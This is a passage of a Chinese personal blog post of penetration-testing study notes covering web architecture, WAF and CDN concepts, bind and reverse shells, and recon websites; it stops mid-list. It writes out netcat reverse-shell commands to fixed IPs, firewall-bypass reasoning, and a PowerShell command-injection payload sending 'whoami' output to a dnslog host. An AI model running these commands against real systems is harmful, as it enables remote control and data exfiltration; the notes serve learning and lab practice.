<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>学习思考 | blog小窝</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="基础入门  Web 应用 Web 架构 web 架构相关内容 反弹 shell   信息打点  业务资产 WEB 单域名 WEB 子域名 Web 架构资产 源码泄露 JS 架构 端口 &amp; 蜜罐 &amp; WAF CDN 绕过   提权  后台权限 数据库权限  mysql 提权 MSSQL 提权">
<meta property="og:type" content="article">
<meta property="og:title" content="学习思考">
<meta property="og:url" content="https://my011215.github.io/2023/08/12/Penetration%20testing/%E5%AD%A6%E4%B9%A0%E6%80%9D%E8%80%83/index.html">
<meta property="og:site_name" content="blog小窝">
<meta property="og:description" content="基础入门  Web 应用 Web 架构 web 架构相关内容 反弹 shell   信息打点  业务资产 WEB 单域名 WEB 子域名 Web 架构资产 源码泄露 JS 架构 端口 &amp; 蜜罐 &amp; WAF CDN 绕过   提权  后台权限 数据库权限  mysql 提权 MSSQL 提权">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://github.com/my011215/my011215.github.io/blob/main/image/390.png?raw=true">
<meta property="og:image" content="https://github.com/my011215/my011215.github.io/blob/main/image/391.png?raw=true">
<meta property="og:image" content="https://github.com/my011215/my011215.github.io/blob/main/image/392.png?raw=true">
<meta property="og:image" content="https://github.com/my011215/my011215.github.io/blob/main/image/393.png?raw=true">
<meta property="og:image" content="https://github.com/my011215/my011215.github.io/blob/main/image/394.png?raw=true">
<meta property="og:image" content="https://github.com/my011215/my011215.github.io/blob/main/image/395.png?raw=true">
<meta property="og:image" content="https://github.com/my011215/my011215.github.io/blob/main/image/394.png?raw=true">
<meta property="article:published_time" content="2023-08-12T03:12:30.000Z">
<meta property="article:modified_time" content="2023-08-12T09:45:48.287Z">
<meta property="article:author" content="草莓布丁">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/my011215/my011215.github.io/blob/main/image/390.png?raw=true">
  
    <link rel="alternate" href="/atom.xml" title="blog小窝" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.4.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">blog小窝</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/categories/%E5%AD%A6%E4%B9%A0%E5%88%86%E4%BA%AB/">学习分享</a>
        
          <a class="main-nav-link" href="/categories/web%E5%AE%89%E5%85%A8/">安全</a>
        
          <a class="main-nav-link" href="/categories/%E5%85%B4%E8%B6%A3/">兴趣</a>
        
          <a class="main-nav-link" href="/richang">日常</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://my011215.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-Penetration testing/学习思考" class="article article-type-post" itemscope itemprop="blogPost"> 
<div class="article-meta">
    <a href="/2023/08/12/Penetration%20testing/%E5%AD%A6%E4%B9%A0%E6%80%9D%E8%80%83/" class="article-date">
  <time datetime="2023-08-12T03:12:30.000Z" itemprop="datePublished">2023-08-12</time>
</a>


    
  <div class="article-category">
    <a class="article-category-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a>►<a class="article-category-link" href="/categories/web%E5%AE%89%E5%85%A8/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      学习思考
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <!-- toc -->
<ul>
<li><a href="#%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8">基础入门</a>
<ul>
<li><a href="#web%E5%BA%94%E7%94%A8">Web 应用</a></li>
<li><a href="#web%E6%9E%B6%E6%9E%84">Web 架构</a></li>
<li><a href="#web%E6%9E%B6%E6%9E%84%E7%9B%B8%E5%85%B3%E5%86%85%E5%AE%B9">web 架构相关内容</a></li>
<li><a href="#%E5%8F%8D%E5%BC%B9shell">反弹 shell</a></li>
</ul>
</li>
<li><a href="#%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9">信息打点</a>
<ul>
<li><a href="#%E4%B8%9A%E5%8A%A1%E8%B5%84%E4%BA%A7">业务资产</a></li>
<li><a href="#web%E5%8D%95%E5%9F%9F%E5%90%8D">WEB 单域名</a></li>
<li><a href="#web%E5%AD%90%E5%9F%9F%E5%90%8D">WEB 子域名</a></li>
<li><a href="#web%E6%9E%B6%E6%9E%84%E8%B5%84%E4%BA%A7">Web 架构资产</a></li>
<li><a href="#%E6%BA%90%E7%A0%81%E6%B3%84%E9%9C%B2">源码泄露</a></li>
<li><a href="#js%E6%9E%B6%E6%9E%84">JS 架构</a></li>
<li><a href="#%E7%AB%AF%E5%8F%A3%E8%9C%9C%E7%BD%90waf">端口 &amp; 蜜罐 &amp; WAF</a></li>
<li><a href="#cdn%E7%BB%95%E8%BF%87">CDN 绕过</a></li>
</ul>
</li>
<li><a href="#%E6%8F%90%E6%9D%83">提权</a>
<ul>
<li><a href="#%E5%90%8E%E5%8F%B0%E6%9D%83%E9%99%90">后台权限</a></li>
<li><a href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9D%83%E9%99%90">数据库权限</a>
<ul>
<li><a href="#mysql%E6%8F%90%E6%9D%83">mysql 提权</a></li>
<li><a href="#mssql%E6%8F%90%E6%9D%83">MSSQL 提权</a></li>
</ul>
</li>
</ul>
</li>
</ul>
<!-- tocstop -->
<span id="more"></span>  
<h2><span id="基础入门"> 基础入门</span></h2>
<h3><span id="web-应用"> Web 应用</span></h3>
<p>个人感觉信息收集的本质就是摸清 web 结构，有一句话说得好” 知己知彼，百战不殆 “，所以常常会说信息收集很重要，之前也只是对信息收集的想法模模糊糊，认为按照一定的顺序收集一些资料就可以。</p>
<ol>
<li>可以从一个网站常规的搭建思路来进行信息收集（从开发层面来思考安全）</li>
</ol>
<p>（1） 搭建形式</p>
<ul>
<li>子域名</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">www.baidu.com  </span><br><span class="line">bbs.baidu.com  </span><br><span class="line">oa.baidu.com</span><br></pre></td></tr></table></figure>
<ul>
<li>端口</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">www.baidu.com:80</span><br><span class="line">www.baidu.com:8889</span><br></pre></td></tr></table></figure>
<ul>
<li>目录<br>
感觉类似与 mvc 架构的路由形式</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">www.baidu.com/index.html</span><br><span class="line">www.baidu.com/index/bbs.php</span><br></pre></td></tr></table></figure>
<ul>
<li>集成环境<br>
 1）docker<br>
 一个常见的容器代表，很多靶场以及个人身边的校内同学会大量使用。部署方便、安全性相对更高。<br>
ps 个人想法：如果目的是为了拿取服务器权限的话，那后期进入了容器内部，是不是应该简单识别一下容器的状况，判别容器信息。<br>
以下是 chatgpt 给出的一些简易方法：</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1. 查看进程：在服务器上运行的应用程序通常作为进程运行。可以使用类似于“ps -ef”命令查看正在运行的进程，如果进程是在容器中运行的，通常会看到包含“docker”或其他容器管理工具名称的进程。  </span><br><span class="line"></span><br><span class="line">2. 查看运行环境：如果网站是在服务器上运行，那么通常需要安装和配置运行环境，如数据库、Web服务器等。可以通过查看服务器上的安装和配置信息来确定网站是在服务器上部署还是在容器中运行。</span><br><span class="line"></span><br><span class="line">3. 查看日志：在服务器上运行的应用程序通常会将日志记录在服务器上的某个目录中。可以查看日志文件来确定网站是在服务器上运行还是在容器中运行。如果日志文件中有关于容器的信息，那么网站就是在容器中运行的。</span><br><span class="line"></span><br><span class="line">4. 查看端口：如果网站是在服务器上运行，那么通常需要监听某个端口来接收客户端请求。可以通过查看服务器上的端口信息来确定网站是在服务器上运行还是在容器中运行。如果网站的端口是在容器中映射到服务器上的端口，那么网站就是在容器中运行的。</span><br></pre></td></tr></table></figure>
<p>2）分配站<br>
这种可以理解成，博客园搭建这种形式，给每个人分配一个博客网站这样子。个人感觉利用 Github 搭建个人网站也类似这个样子。<br>
3）利用宝塔、phpstudy 等面板搭建网站</p>
<p>总结：利用集成环境搭建会更方便，门槛也相对较低，也更加安全。但是可以根据一些爆出的漏洞进行结合利用。n’n</p>
<p>（2）程序源码（是否可以代码审计）<br>
开源 VS 闭源</p>
<p>（3）数据库部署情况</p>
<ul>
<li>本地服务器部署</li>
<li>云数据库</li>
<li>服务器数据库部署</li>
</ul>
<p>总结：本地服务器部署相对来说划算一点，但是可能暴露的弱点也会相对较多。云数据库和服务器数据库更为安全。</p>
<h3><span id="web-架构"> Web 架构</span></h3>
<p>从开发层面总体认识一下常见的结构。</p>
<ol>
<li>常规</li>
</ol>
<ul>
<li>同一台服务器部署<br>
感觉这种结构很常规，如果有突破点也很容易获取各种权限，也更容易思考一些情况。</li>
</ul>
<ol start="2">
<li>站库分离</li>
</ol>
<ul>
<li>源码和数据库分离部署<br>
这个时候数据影响主要是另外一个服务器，有可能是另外一台服务器部署数据库或者是在另外一台服务器上使用云数据库产品。<br>
总之呢，比常规的要相对安全一点，数据安全很大得到了保证。</li>
</ul>
<ol start="3">
<li>前后端分离</li>
</ol>
<ul>
<li>
<p>使用 API 接口传输数据<br>
这个本人之前做一些实验和比赛相关的项目时，使用过基于 python 的 flask 框架和基于 java 的 springboot 框架的相关内容。<br>
个人感觉开发时真的很爽，前端和后端分离开发，最后月接口传输数据即可，避免了大量扯皮，开发时间也节约了。</p>
</li>
<li>
<p>前端页面大部分不存在漏洞<br>
哈，这个我可深有体会。之前测试一个前端采用 vue 写的项目，我尝试测试了很久的 xss 都无果，关键字都被实体化了，使用框架还是很安全的。</p>
</li>
<li>
<p>后端管理大部分不在同域名<br>
感觉会有一个后台数据管理的界面，域名可能和前端域名不一致，所以还得通过一些办法找到后台管理的网址。如果不在同一个域名下，那么如果在原来域名获取到相关权限很有可能不影响后端。</p>
</li>
</ul>
<ol start="4">
<li>
<p>集成环境<br>
比如宝塔、phpstudy 等打包类集成环境，可以很轻松搭建好环境。但是这里有一个很显而易见的问题，举个例子。比如我上传了 webshell 获取网站权限，我想命令执行，一些集成环境处于安全性考虑可能不能触发相关命令，另外一些则可以触发相关命令，不太版本也可能存在不同情况，因此个人感觉还需要多积累。</p>
</li>
<li>
<p>docker 容器</p>
</li>
</ol>
<ul>
<li>
<p>虚拟化独立磁盘空间，非正式物理环境。<br>
类似于一个小型虚拟机，但是虚拟机是模拟出一个真实的操作系统，对宿主机进行了很严格的隔离。而 docker 是模拟出具体的环境，我也常常使用 docker 来拉取一些特定的环境来进行漏洞复现。<br>
它的特定是拉取方便，不用管各种环境搭建（环境搭建是一个复杂的过程，有时候很顺利，有时候会遇到各种奇奇怪怪的问题），还有就是体积小轻巧。但是呢，隔离性就没有虚拟机那么严格，看过一些资料说 docker 的内核其实和本机还是共用一个，所以可以利用 docker 逃逸来提权或者是作为跳板机之类的思维扩宽打法。</p>
</li>
<li>
<p>docker 一些常用命令<br>
<a target="_blank" rel="noopener" href="https://www.runoob.com/docker/docker-hello-world.html"> https://www.runoob.com/docker/docker-hello-world.html</a></p>
</li>
</ul>
<p>一些问题，vmware 挂载虚拟机，重新运行容器发现可以成功启动但是访问不了，原因是需要将 docker 的网络接口设置为不被 NetworkManager 管理。<br>
解决办法：<br>
（1）<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_46439731/article/details/128124219">https://blog.csdn.net/weixin_46439731/article/details/128124219</a><br>
（2）每次 systemctl restart docker</p>
<ol start="6">
<li>建站分配站</li>
</ol>
<ul>
<li>申请</li>
<li>托管<br>
比如挂载在 Github 或者博客园的个人网站，还有就是一些网站托管平台，这些网站有一个特征就是域名会带由主站的域名特征，这个时候如果要去渗透这些网站，那么很大可能就是在渗透主站，实质安全测试非目标资产。</li>
</ul>
<h3><span id="web-架构相关内容"> web 架构相关内容</span></h3>
<ol>
<li>WAF</li>
</ol>
<ul>
<li>
<p>web 应用防火墙，对常见的攻击进行检测和过滤防护</p>
</li>
<li>
<p>硬件型 WAF<br>
F5 BIG-IP<br>
Imperva SecureSphere</p>
</li>
<li>
<p>软件型 WAF<br>
 安全狗<br>
云锁<br>
 D 盾</p>
</li>
<li>
<p>云 WAF<br>
 阿里云云盾<br>
腾讯云 WAF</p>
</li>
<li>
<p>自定义 WAF<br>
 这个就相当于自己写代码，根据本款产品特性过滤出一些字符等，如果代码写的不错，这样子就会更贴近本款产品特性，但是对开发人员要求也更高。</p>
</li>
<li>
<p>WAF 的一些常见相关技术<br>
（1）机器学习<br>
（2）词法分析<br>
<img src="https://github.com/my011215/my011215.github.io/blob/main/image/390.png?raw=true" alt><br>
（3）行为识别<br>
（4）大数据关联分析</p>
</li>
</ul>
<ol start="2">
<li>CDN</li>
</ol>
<ul>
<li>内容分发网络<br>
用于提高访问速度，可以理解为负载均衡的一种实现方式。但是呢，他又不只仅仅只有负载均衡的功能。<br>
很容易理解，为了提高访问速度，他最本质的技术就是在每个地方增加一个 ip 访问节点 ，将网站内容流量放进对应地方的节点中，当用户访问该域名时，域名解析服务器会根据用户所在地点，根据最近原则分配最近的 IP，这样就可以提高访问速度。<br>
如果酱紫的话，就会导致一个问题，隐藏 IP，每个地方 IP 都不同，那么如何获取真实 IP 呢？</li>
</ul>
<ol start="3">
<li>OSS 存储</li>
</ol>
<ul>
<li>
<p>云存储服务<br>
感觉 oss 有点像站库分离，类似于云数据库之类的</p>
</li>
<li>
<p>为什么使用第三方存储？<br>
（1）静态资源文件占用大量带宽，降低访问速度（卡！！！，说白了，就是用户体验感不好）<br>
（2）消耗存储空间</p>
</li>
<li>
<p>从安全防护角度思考 OSS 存储<br>
假如我们上传了一个后门到 OSS 存储对应的存储空间中，使用相关工具获得权限后，发现只是那个存储空间的权限，并不能获取整个网站和服务器的权限，权限相对较低。自然，我们所能查看的内容也就是存储空间里的一些 东西，所以在信息收集的时候就得思考价值问题，如果你花大量时间好不容易进去了，结果只是一些垃圾数据，那么无疑是痛苦的。</p>
</li>
</ul>
<p><img src="https://github.com/my011215/my011215.github.io/blob/main/image/391.png?raw=true" alt></p>
<ol start="4">
<li>反向代理<br>
<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/464965616"> https://zhuanlan.zhihu.com/p/464965616</a></li>
</ol>
<ul>
<li>
<p>正向代理<br>
 eg：我主动使用代理访问国外服务器资源</p>
</li>
<li>
<p>反向代理<br>
国外服务器将流量资源放入到一台我可以访问的服务器中，这样我就直接访问那台服务器就可以直接获取相关资源。</p>
</li>
<li>
<p>如果一个网站使用了反向代理，从安全防护层面分析一下有什么意义<br>
正向代理 -&gt; 反向代理 -&gt; 反向代理的意义是什么 -&gt; 对于 web 安全来说有啥相关的意义</p>
</li>
</ul>
<p><img src="https://github.com/my011215/my011215.github.io/blob/main/image/392.png?raw=true" alt></p>
<ol start="5">
<li>负载均衡<br>
把浏览器资源分到自己的多台服务器资源上，根据权重分配，这样的话就存在多个目标，IP 就会有多个，但是自然没有 CDN 那么多，而且也不会有就近分配的特点。</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#定义负载设置</span><br><span class="line">upstream fzjh&#123;</span><br><span class="line">	server 47.94.236.117:80 weight=2;</span><br><span class="line">	server 47.122.22.195:80 weight=1;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">#定义访问路径 访问策略</span><br><span class="line">location / &#123;</span><br><span class="line">    proxy_pass http://fzjh/;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3><span id="反弹-shell"> 反弹 shell</span></h3>
<ul>
<li>命令生成工具<br>
<a target="_blank" rel="noopener" href="https://forum.ywhack.com/bountytips.php?download"> https://forum.ywhack.com/bountytips.php?download</a><br>
 这个工具可以生成各种系统和环境的文件下载命令（反弹需要 nc，有些服务器没有，这时候需要命令执行下载好后才能继续反弹）</li>
</ul>
<ol>
<li>linux 控制 windows<br>
widows:  142.112.11.21<br>
linux:  116.47.21.8<br>
<img src="https://github.com/my011215/my011215.github.io/blob/main/image/393.png?raw=true" alt></li>
</ol>
<ul>
<li>正向连接</li>
</ul>
<p>windows</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">绑定CMD到本地5566端口</span><br><span class="line">nc -e cmd -lvp 5566</span><br></pre></td></tr></table></figure>
<p>linux</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">主动连接目标5566</span><br><span class="line">ncat 142.112.11.21 5566</span><br></pre></td></tr></table></figure>
<ul>
<li>反向连接</li>
</ul>
<p>linux</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//等待5566连接</span><br><span class="line">ncat -lvvp 5566</span><br></pre></td></tr></table></figure>
<p>windows</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//绑定CMD到目标5566端口</span><br><span class="line">nc -e cmd 116.47.21.8 5566</span><br></pre></td></tr></table></figure>
<ol start="2">
<li>windows 控制 linux<br>
widows:  142.112.11.21<br>
linux:  116.47.21.8</li>
</ol>
<ul>
<li>正向连接</li>
</ul>
<p>linux</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//绑定SH到本地5566端口</span><br><span class="line">ncat -e /bin/sh -lvp 5566</span><br></pre></td></tr></table></figure>
<p>windows</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//主动连接目标5566</span><br><span class="line">nc 116.47.21.8 5566</span><br></pre></td></tr></table></figure>
<ul>
<li>反向连接</li>
</ul>
<p>windows</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">等待5566连接</span><br><span class="line">nc -lvvp 5566</span><br></pre></td></tr></table></figure>
<p>linux</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//绑定sh到目标5566端口</span><br><span class="line">ncat -e /bin/sh 142.112.11.21 5566</span><br></pre></td></tr></table></figure>
<ol start="3">
<li>为什么需要反弹 shell</li>
</ol>
<ul>
<li>
<p>解决数据回显、无图形化问题<br>
有时候命令执行数据可能不会回显显示，还有就是操作比较麻烦，我们采用反弹 shell 的思路进行连接可以轻松得到对方主机命令界面，获取我们想要的很多数据。</p>
</li>
<li>
<p>防火墙绕过（出站入站设置）<br>
目标机因防火墙受限，目标机器只能发送请求，不能接收请求。<br>
widows:  142.112.11.21<br>
linux:  116.47.21.8<br>
linux 控制 windows<br>
（1）开启入站策略（入站请求进行过滤）<br>
这个时候可以考虑出站，既然 L 不能主动连接 W，那么就让 W 把权限放给 L 的端口，L 保持监听。<br>
反向连接<br>
 Linux</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ncat -lvvp 5566</span><br></pre></td></tr></table></figure>
<p>windows</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -e cmd 116.47.21.8 5566</span><br></pre></td></tr></table></figure>
<p>我不敢轻易动本机防火墙配置，把实验改成虚拟机的两台机器，一台 kali，一台 Centos。同样俺们的 kali 充当攻击机的角色。</p>
<p>（2）开启出站策略（出战请求过滤）<br>
这个时候出站严格就要考虑入站，那就 L 主动连接 W 吧。<br>
正向连接<br>
 windows</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">绑定CMD到本地5566端口</span><br><span class="line">nc -e cmd -lvp 5566</span><br></pre></td></tr></table></figure>
<p>linux</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">主动连接目标5566</span><br><span class="line">ncat 142.112.11.21 5566</span><br></pre></td></tr></table></figure>
<ul>
<li>
<p>内网服务器、IP 动态变化<br>
<img src="https://github.com/my011215/my011215.github.io/blob/main/image/394.png?raw=true" alt><br>
如图，如果想要 A 控制 B。<br>
（1）我们先考虑正向连接，如果 A 给 B 发送连接请求，由于 B 的 IP 是内网 IP 不是和 A 一个局域网的，导致无法连接上，在者就是如果 B 的 IP 是变化的也无法连接。<br>
（2）我们再考虑反向连接，如果 B 把权限给到 A 的端口，A 保持监听，由于 A 攻击者让 B 发请求肯定是确定 A 的 IP（可以控制），所以不存在连接不上的问题，除非 B 设置了出站策略。</p>
</li>
<li>
<p>综上<br>
（1）目标机因防火墙受限，目标机器只能发送请求，不能接收请求。<br>
（2）目标机端口被占用。<br>
（3）目标机位于局域网，或 IP 会动态变化，攻击机无法直接连接。<br>
（4）对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机，都是未知的。</p>
</li>
<li>
<p>一些小问题<br>
友链参考：<a target="_blank" rel="noopener" href="https://returntoinnocence.github.io/posts/tech/linux%E8%99%9A%E6%8B%9F%E6%9C%BA%E9%85%8D%E7%BD%AE%E9%97%AE%E9%A2%98/">https://returntoinnocence.github.io/posts/tech/linux 虚拟机配置问题 /</a></p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">kali 处于虚拟机（NAT模式）  </span><br><span class="line">windows是主机  </span><br><span class="line">1. windows控制kali正向反向都可以</span><br><span class="line">2. kali控制windows</span><br><span class="line">正向可以，反向不可以</span><br><span class="line">问题：kali不可以反向是因为是nat模式的原因嘛？</span><br></pre></td></tr></table></figure>
<p><img src="https://github.com/my011215/my011215.github.io/blob/main/image/395.png?raw=true" alt></p>
<ul>
<li>正反向内网外网例子理解</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">悦悦控制kali  （外网控制内网）</span><br></pre></td></tr></table></figure>
<p>（1）正向<br>
 kali<br>
 把 /bin/bash 权限给到 5566 端口<br>
悦悦<br>
主动连接 kali 的 5566 端口<br>
 kali 的 ip 是内网的找不到<br>
（2）反向<br>
悦悦<br>
等待 5566 连接<br>
 kali<br>
 把 /bin/bash 权限给到悦悦的 5566 端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kali控制悦悦（内网控制公网）</span><br></pre></td></tr></table></figure>
<p>（1）正向<br>
悦悦<br>
把 /bin/bash 权限给到自己的 5566 端口<br>
 kali<br>
 主动去连接悦悦的 5566 端口<br>
（2）反向<br>
 kali<br>
 等待 5566 端口连接<br>
悦悦<br>
将 /bin/bash 权限给到 kali 的 5566 端口<br>
（kali 的 ip 是内网找不到）</p>
<ol start="4">
<li>命令执行不回显怎么办？</li>
</ol>
<ul>
<li>带外查询<br>
<a target="_blank" rel="noopener" href="http://t.csdn.cn/PmT4b"> http://t.csdn.cn/PmT4b</a><br>
 管道符：| (管道符号) ||（逻辑或） &amp;&amp;（逻辑与）  &amp;(后台任务符号)</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Windows-&gt;| &amp; || &amp;&amp;</span><br><span class="line">Linux-&gt;; | || &amp; &amp;&amp; ``(特有``和;)</span><br></pre></td></tr></table></figure>
<p>powershell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$x=whoami;$x=$x.Replace(&#x27;\&#x27;,&#x27;xxx&#x27;);$y=&#x27;.vpod5d.dnslog.cn&#x27;;$z=$x+$y;ping $z</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">127.0.0.1 | powershell $x=whoami;$x=$x.Replace(&#x27;\&#x27;,&#x27;xxx&#x27;);$y=&#x27;.vpod5d.dnslog.cn&#x27;;$z=$x+$y;ping $z</span><br></pre></td></tr></table></figure>
<ul>
<li>反弹 shell</li>
</ul>
<h2><span id="信息打点"> 信息打点</span></h2>
<p>信息收集初学的时候感觉很混乱，是很杂乱收集的一个过程，当时还只是单纯觉得像一个任务书一样，对每个任务进行打勾筛查即可。总感觉就是类似于没有思考的机器收集。</p>
<p>其实不是这样的，信息收集很多人都说是很重要的一步，既然重要怎么会如此机械呢？最重要的当然就是思考利用！信息收集就是了解对方的一个过程，你要想办法摸清对方架构，运用了什么技术，有哪些资产，有没有之前的漏洞，等等这些都是后面漏洞利用的一个突破点，能不能有一个好的漏洞思路也是由这里引发而来。</p>
<h3><span id="业务资产"> 业务资产</span></h3>
<p>搞清楚公司规模，涉及网址业务信息等</p>
<ol>
<li>WEB 应用</li>
<li>APP 应用</li>
<li>PC 端应用</li>
<li>小程序应用</li>
<li>微信公众号</li>
<li>其他产品等</li>
</ol>
<h3><span id="web-单域名"> WEB 单域名</span></h3>
<ol>
<li>备案信息</li>
<li>企业产权</li>
<li>注册域名</li>
<li>反查解析</li>
</ol>
<h3><span id="web-子域名"> WEB 子域名</span></h3>
<ol>
<li>DNS 数据</li>
<li>证书查询</li>
<li>网络空间</li>
<li>威胁情报</li>
<li>枚举解析</li>
</ol>
<h3><span id="web-架构资产"> Web 架构资产</span></h3>
<ol>
<li>程序语言</li>
<li>框架源码</li>
<li>搭建平台</li>
<li>数据库类</li>
<li>操作系统</li>
</ol>
<ul>
<li>企业信息</li>
</ul>
<ol>
<li>天眼查<br>
<a target="_blank" rel="noopener" href="https://www.tianyancha.com/"> https://www.tianyancha.com/</a></li>
<li>小蓝本<br>
<a target="_blank" rel="noopener" href="https://www.xiaolanben.com/"> https://www.xiaolanben.com/</a></li>
<li>爱企查<br>
<a target="_blank" rel="noopener" href="https://aiqicha.baidu.com/"> https://aiqicha.baidu.com/</a></li>
<li>企查查<br>
<a target="_blank" rel="noopener" href="https://www.qcc.com/"> https://www.qcc.com/</a></li>
<li>国外企查<br>
<a target="_blank" rel="noopener" href="https://opencorporates.com/"> https://opencorporates.com/</a></li>
</ol>
<ul>
<li>备案信息</li>
</ul>
<ol>
<li><a target="_blank" rel="noopener" href="http://www.beianx.cn/">http://www.beianx.cn/</a></li>
<li><a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/">https://beian.miit.gov.cn/</a></li>
</ol>
<ul>
<li>公众号信息</li>
</ul>
<ol>
<li><a target="_blank" rel="noopener" href="https://weixin.sogou.com/">https://weixin.sogou.com/</a></li>
</ol>
<ul>
<li>域名注册查询</li>
</ul>
<ol>
<li><a target="_blank" rel="noopener" href="https://buy.cloud.tencent.com/domain">https://buy.cloud.tencent.com/domain</a></li>
</ol>
<ul>
<li>IP 反查域名</li>
</ul>
<ol>
<li><a target="_blank" rel="noopener" href="https://x.threatbook.cn/">https://x.threatbook.cn/</a></li>
</ol>
<ul>
<li>DNS 数据<br>
很直观形象的展示了 A 记录、MX 记录、DNS 记录，还有可视化数据展示，感觉很 nice。</li>
</ul>
<ol>
<li><a target="_blank" rel="noopener" href="https://dnsdumpster.com/">https://dnsdumpster.com/</a></li>
</ol>
<ul>
<li>证书查询<br>
根据 https 证书查询，大部分公司会使用同一个证书注册</li>
</ul>
<ol>
<li><a target="_blank" rel="noopener" href="https://crt.sh/">https://crt.sh/</a></li>
</ol>
<ul>
<li>网络空间测绘</li>
</ul>
<ol>
<li>fofa<br>
